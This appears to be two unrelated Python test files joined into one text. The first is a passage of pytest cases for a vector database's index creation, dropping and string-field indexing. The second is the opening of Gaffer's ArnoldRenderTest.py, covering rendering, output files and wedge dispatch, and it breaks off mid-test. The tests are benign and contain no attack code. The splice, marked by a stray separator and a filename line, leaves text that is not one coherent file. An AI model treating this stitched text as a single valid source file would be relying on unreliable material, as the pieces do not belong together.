vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_ip_params, default_limit,
default_search_exp)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
def build(collection_w):
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
threads_num = 8
threads = []
for i in range(threads_num):
t = MyThread(target=build, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_no_vectors_insert_ip(self):
"""
target: test create index interface when there is no vectors in collection,
and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index,
add entities in it
expected: return insert suceess
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
collection_w.insert(data=data)
assert collection_w.num_entities == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_create_same_index_repeatedly_ip(self):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_different_name_ip(self):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: raise error
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params, index_name="a")
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params, index_name="b",
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "CreateIndex failed: creating multiple indexes on same field is not supported"})
def test_create_different_index_repeatedly_ip(self):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: drop index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_prams = [default_ip_index_params,
{"metric_type": "IP", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in index_prams:
index_name = cf.gen_unique_str("name")
collection_w.create_index(default_float_vec_field_name, index, index_name=index_name)
collection_w.load()
collection_w.drop_index(index_name=index_name)
assert len(collection_w.collection.indexes) == 0
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index(self, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
# TODO #7372
def test_drop_index_repeatedly(self, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
collection_w.drop_index(index_name=ct.default_index_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "Index doesn\'t exist."})
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name)
self.connection_wrap.remove_connection(ct.default_alias)
collection_w.drop_index(index_name=ct.default_index_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "should create connect first."})
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
if get_simple_index["index_type"] != "FLAT":
for i in range(4):
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
get_simple_index["metric_type"] = "IP"
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
collection_w.drop_index(index_name=ct.default_index_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "Index doesn\'t exist."})
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params,
index_name=ct.default_index_name)
self.connection_wrap.remove_connection(ct.default_alias)
collection_w.drop_index(index_name=ct.default_index_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "should create connect first."})
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
if get_simple_index["index_type"] != "FLAT":
for i in range(4):
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_create_PQ_without_nbits(self):
"""
target: test create PQ index
method: create PQ index without nbits
expected: create successfully
"""
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
collection_w.create_index(ct.default_float_vec_field_name, PQ_index, index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.drop_index(index_name=default_field_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "Index doesn\'t exist."})
class TestNewIndexBinary(TestcaseBase):
def get_simple_index(self, request):
log.info(request.param)
return copy.deepcopy(request.param)
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data()
collection_w.insert(data=df)
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=binary_field_name)
assert collection_w.has_index(index_name=binary_field_name)[0] == True
@pytest.mark.tags(CaseLabel.L0)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
df, _ = cf.gen_default_binary_dataframe_data()
ins_res, _ = partition_w.insert(df)
assert len(ins_res.primary_keys) == len(df)
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params,
index_name=binary_field_name)
assert collection_w.has_index(index_name=binary_field_name)[0] == True
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L0)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data()
collection_w.insert(data=df)
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params,
index_name=binary_field_name)
collection_w.load()
_, vectors = cf.gen_binary_vectors(default_nq, default_dim)
collection_w.search(vectors[:default_nq], binary_field_name,
default_search_binary_params, default_limit,
default_search_exp)
# @pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self):
"""
target: test create index interface with invalid metric type
method: add entities into binary collection, flush, create index with L2 metric type.
expected: return create_index failure
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
binary_index_params = {'index_type': 'BIN_IVF_FLAT', 'metric_type': 'L2', 'params': {'nlist': 64}}
collection_w.create_index(default_binary_vec_field_name, binary_index_params,
index_name=binary_field_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0,
ct.err_msg: "Invalid metric_type: L2, which does not match the index type: BIN_IVF_FLAT"})
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data()
collection_w.insert(data=df)
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params,
index_name=binary_field_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=binary_field_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_partition(self):
"""
target: test drop index interface
method: create collection, create partition and add entities in it,
create index on collection, call drop collection index
expected: return code 0, and default index param
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
df, _ = cf.gen_default_binary_dataframe_data()
ins_res, _ = partition_w.insert(df)
assert len(ins_res.primary_keys) == len(df)
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params,
index_name=binary_field_name)
assert collection_w.has_index(index_name=binary_field_name)[0] == True
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=binary_field_name)
assert collection_w.has_index(index_name=binary_field_name)[0] == False
assert len(collection_w.indexes) == 0
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test create index interface for invalid scenario
method: create index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop index interface for invalid scenario
method: drop index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
"""
target: test create index interface for invalid scenario
method: create index with invalid index params
expected: raise exception
"""
log.info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestNewIndexAsync(TestcaseBase):
@pytest.fixture(scope="function", params=[False, True])
def _async(self, request):
yield request.param
def call_back(self):
assert True
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, _async):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
res, _ = collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name, _async=_async)
if _async:
res.done()
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L0)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, _async):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
res, _ = collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name, _async=_async)
if _async:
res.done()
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L0)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
res, _ = collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name, _async=True,
_callback=self.call_back())
class TestIndexString(TestcaseBase):
"""
******************************************************************
The following cases are used to test create index about string
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_with_string_field(self):
"""
target: test create index with string field is not primary
method: 1.create collection and insert data
2.only create an index with string field is not primary
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_with_string_before_load(self):
"""
target: test create index with string field before load
method: 1.create collection and insert data
2.create an index with string field before load
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
collection_w.insert(data=data)
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
collection_w.load()
assert collection_w.num_entities == default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_load_after_create_index_with_string(self):
"""
target: test load after create index with string field
method: 1.create collection and insert data
2.collection load after create index with string field
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
collection_w.insert(data=data)
collection_w.load()
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
assert collection_w.num_entities == default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_with_string_field_is_primary(self):
"""
target: test create index with string field is primary
method: 1.create collection
2.insert data
3.only create an index with string field is primary
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_string_pk_default_collection_schema()
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_or_not_with_string_field(self):
"""
target: test create index, half of the string fields are indexed and half are not
method: 1.create collection
2.insert data
3.half of the indexes are created and half are not in the string fields
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
string_fields = [cf.gen_string_field(name="test_string")]
schema = cf.gen_schema_multi_string_fields(string_fields)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_dataframe_multi_string_fields(string_fields=string_fields)
collection_w.insert(df)
self.index_wrap.init_index(collection_w.collection, default_string_field_name, default_string_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_with_same_index_name(self):
"""
target: test create index with different fields use same index name
method: 1.create collection
2.insert data
3.only create index with different fields use same index name
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=index_name2)
collection_w.create_index(default_float_vec_field_name, default_index_params,
index_name=index_name2,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "CreateIndex failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_create_different_index_fields(self):
"""
target: test create index with different fields
method: 1.create collection
2.insert data
3.create different indexes with string and float vector field
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.create_index(default_float_vec_field_name, default_index_params, index_name=index_name1)
assert collection_w.has_index(index_name=index_name1)[0] == True
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=index_name2)
assert collection_w.has_index(index_name=index_name2)[0] == True
assert len(collection_w.indexes) == 2
@pytest.mark.tags(CaseLabel.L1)
def test_create_different_index_binary_fields(self):
"""
target: testing the creation of indexes with string and binary fields
method: 1.create collection
2.insert data
3.create different indexes with string and binary vector field
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data()
collection_w.insert(data=df)
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=index_name2)
assert collection_w.has_index(index_name=index_name2)[0] == True
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params, index_name=index_name3)
assert collection_w.has_index(index_name=index_name3)[0] == True
assert len(collection_w.indexes) == 2
@pytest.mark.tags(CaseLabel.L1)
def test_drop_index_with_string_field(self):
"""
target: test drop index with string field
method: 1.create collection and insert data
2.create index and use index.drop() drop index
expected: drop index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
self.index_wrap.drop()
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_collection_drop_index_with_string(self):
"""
target: test drop index with string field
method: 1.create collection and insert data
2.create index and uses collection.drop_index () drop index
expected: drop index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=index_name2)
collection_w.drop_index(index_name=index_name2)
assert len(collection_w.indexes) == 0
|
ArnoldRenderTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import six
import IECore
import IECoreImage
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferOSL
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.SceneAlgo.deregisterRenderAdaptor( "Test" )
def testExecute( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.assertFalse( p.returncode )
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.assertFalse( p.returncode )
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.####.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
c = Gaffer.Context()
for i in range( 1, 4 ) :
c.setFrame( i )
with c :
s["render"]["task"].execute()
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferArnold )
self.assertTypeNamesArePrefixed( GafferArnoldTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferArnold )
self.assertDefaultNamesAreCorrect( GafferArnoldTest )
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferArnold )
self.assertNodesConstructWithDefaultValues( GafferArnoldTest )
def testDirectoryCreation( self ) :
s = Gaffer.ScriptNode()
s["variables"].addChild( Gaffer.NameValuePlug( "renderDirectory", self.temporaryDirectory() + "/renderTests" ) )
s["variables"].addChild( Gaffer.NameValuePlug( "assDirectory", self.temporaryDirectory() + "/assTests" ) )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = GafferDispatch.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
